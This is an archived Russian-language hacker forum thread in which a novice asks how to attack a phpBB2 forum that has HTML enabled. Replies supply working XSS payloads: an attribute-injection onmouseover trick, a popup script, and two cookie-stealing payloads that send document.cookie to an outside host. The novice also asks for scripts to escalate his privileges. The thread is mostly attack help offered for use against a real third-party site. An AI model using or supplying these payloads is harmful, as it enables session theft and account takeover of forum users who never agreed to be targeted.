Просмотр полной версии : PHPbb2 нашел форму где html-тэг ON
Вто нашел такой форум, где хтмл тэги включены, как можно сломать?
не бейте сильно, я только учусь :) ;)
delay(0)
18.12.2006, 17:04
xss
<pre a='>' onmouseover='alert(/XSS/)' b='<pre' >
xss
я одном топике ответил данным сообщением, вывелось вот это:
<pre>
а что дальше? можешь в аську стукнуть? или тут написать?
гы..я ломать ничего не хочу :)
просто хочу понять уязвимость.
эта уязвимость называется xss -- что расшифоровывается как крос сайт скриптингъъъ -- вообщем можно вставлять --- любой текст -- подумай сам если вставить javascript код -- то браузер его воспримет как код и выполнит --- =) лол
эта уязвимость называется xss -- что расшифоровывается как крос сайт скриптингъъъ -- вообщем можно вставлять --- любой текст -- подумай сам если вставить javascript код -- то браузер его воспримет как код и выполнит --- =) лол
ОО спасибо, т.е вместо скрипта XSS могу любой яваскрипт вставить :)
а чтобы права расширить свои, какие скрипты посоветуете? )
<pre a='>' onmouseover='alert(/<script language="JavaScript">
WOweb=window.open("ВЗЛОМ/","mr-troy", "width=200, height=143, toolbar=0, location=0, status=0, menubar=0, scrollbars=0, resizable=0,left=1,top=1")
</script>)' b='<pre' >
Вот так работаеть будет? Типа всплывающее окно.
дай фсетаки форум =)
ломать не буим но посмеёмся =))
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
читай статьи про XSS, там описано как что сделать...
~!DoK_tOR!~
23.12.2006, 21:39
<img src=''http://antichat.ru/cgi-bin/s.jpg'' style=background:url(javascript:document.images[1].src=''http://antichat.ru/s.jpg?''+document.cookie)>
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot